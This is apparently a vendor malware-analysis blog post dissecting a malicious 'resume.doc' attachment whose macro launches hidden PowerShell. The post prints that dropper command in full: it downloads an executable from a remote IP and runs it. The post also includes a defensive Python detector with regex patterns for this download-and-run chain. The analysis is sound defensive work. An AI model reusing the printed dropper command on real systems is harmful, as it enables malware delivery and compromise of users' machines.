
VMRay Analyzer Identifies Resume Containing Evasive Malware

Recently, we received a seemingly innocuous job application with an attached Word document called “resume.doc”. Let’s take a closer look at the malicious behavior embedded in this fake resume.

Figure 1: Incoming Job Application E-mail with Malicious Attachment “resume.doc”.

Upon uploading the Word doc into VMRay Analyzer, the file hash was sent to our built-in reputation service, where it was queried against known malicious and known benign files. In this case there were no hits and the file was classified as “unknown”, so we proceeded to dynamically analyze it. After detonating it for analysis in several different Windows 7 environments, we classified the file as “Malicious”, since it received the highest possible VTI (VMRay Threat Identifier) Score of 100/100 (Figure 2).

Figure 2: “resume.doc” classified as “unknown” by the built-in reputation service.

To understand the score, let’s take a deeper dive into the observed behavior of the file (Figure 3):

Figure 3: Detailed look at the observed behavior from “resume.doc”.

Starting from the VTI by Score view, we get a high-level picture of the file’s behavior. The first two entries of the Detected Threats table indicate that the file engages in code injection, modifying the memory and control flow of several processes, including “explorer.exe”. This is a common malware technique: embedding code in the live memory of a known-good process that would typically be running anyway on a Windows machine.

In the third entry, we see that the malware has set up a server to accept incoming network connections, probably from a C&C (command and control) server. Further along in the VTI Information, we can see that a PE (portable executable) is dropped and executed on the machine. The dropped file, “29546.exe”, is a known malicious file.

Finally, it’s important to note that a VBA macro was executed, triggered by a user choosing to ‘enable editing’ through social engineering. A macro isn’t in and of itself suspicious, but it is often a necessary condition for compromise of the target machine.

Now let’s look at the process graph to get a better understanding of the sequence of events (Figure 4).

Figure 4: Malware creates a Powershell process that drops a PE file and executes it.

From winword.exe, the malware creates a PowerShell process in a hidden window, which downloads the aforementioned PE file to the user’s temp directory under a random name and executes it:

    Create process "powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http:\185.165.29.36\google.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}"
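As an added defender-side illustration (not code from the original post or from VMRay’s product), the following Python checks process-creation records for the elements of the dropper command above: an Office parent process, a hidden PowerShell window, a WebClient download into %TEMP%, and an immediate Start-Process of the downloaded file. The event layout and the sample records are constructed here, and the download URL is a placeholder.

```python
import re
from dataclasses import dataclass

# Each pattern mirrors one element of the dropper command quoted above.
INDICATORS = {
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.IGNORECASE),
    "web_download": re.compile(r"\bDownloadFile\s*\(", re.IGNORECASE),
    "temp_exe_drop": re.compile(r"\$env:temp\b.*\.exe", re.IGNORECASE),
    "exec_dropped": re.compile(r"\bStart-Process\b", re.IGNORECASE),
}
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon event 1 style, constructed here)."""
    parent_image: str
    image: str
    command_line: str


def matched_indicators(ev: ProcessEvent) -> list:
    """Return the names of the command-line indicators present in a PowerShell launch."""
    if not ev.image.lower().endswith("powershell.exe"):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]


def office_spawned(ev: ProcessEvent) -> bool:
    """True when the parent is an Office application such as winword.exe."""
    return ev.parent_image.lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS


def classify(ev: ProcessEvent) -> str:
    """'malicious' when an Office parent launches PowerShell with a download-and-run chain."""
    hits = matched_indicators(ev)
    if office_spawned(ev) and {"web_download", "exec_dropped"} <= set(hits):
        return "malicious"
    if len(hits) >= 3:
        return "suspicious"
    return "benign"


# Constructed sample events: the first reproduces the shape of the command seen in
# the analysis (URL replaced by a placeholder); the second is a routine admin script.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;"
                 "$path = $env:temp + '\\' + 4242 + '.exe';"
                 "$webclient.DownloadFile('http://PLACEHOLDER/google.jpg', $path);Start-Process $path"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
]
```

Running `classify` over each record in `SAMPLE_EVENTS` flags the Word-spawned download chain as malicious and leaves the explorer-launched maintenance script alone.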

It is from this PE file that most of the malicious behavior originates: it escalates privileges and injects code into explorer.exe, which in turn creates and injects code into many new malicious processes and generates much of the suspicious network traffic, performing over 7000 network operations across its 13 threads.

Taking a look at the Involved Hosts map, we can get a high-level visual of the remote connections and network activity (Figure 5).

Figure 5: High-Level look at remote connections made by the malware

Figure 6 lists the domains, IP addresses, countries, and protocols for all network activity initiated by the malware. This particular sample establishes connections with remote hosts across the US and EMEA, and in the first row we can see the malware connect to a domain called “myexternalip.com” to perform geolocation, a technique often used by targeted, context-aware malware.

Figure 6: Connections established across the US & EMEA

Throughout execution, the malware attempts to evade VMRay Analyzer’s detection by making several sleep function calls to exploit a natural shortcoming of automated systems: an analysis timeout. However, VMRay Analyzer detects this sandbox evasion tactic and truncates the total sleep time in order to monitor the true functionality of the malware before the default timeout of 2 minutes (Figure 7).

Figure 7: VMRay Analyzer truncates sandbox evasion technique used by the malware

By now, I am sure most of you have seen an example of malware that stems from a Word document via an embedded macro. While it is not a new or creative method of infection, it remains an effective way of packaging and deploying known malicious files, such as the PE dropped and executed during this analysis. Overall, despite the malware author’s best efforts, the resume document is exposed for its malicious behavior by VMRay Analyzer.

View the Full Malware Analysis Report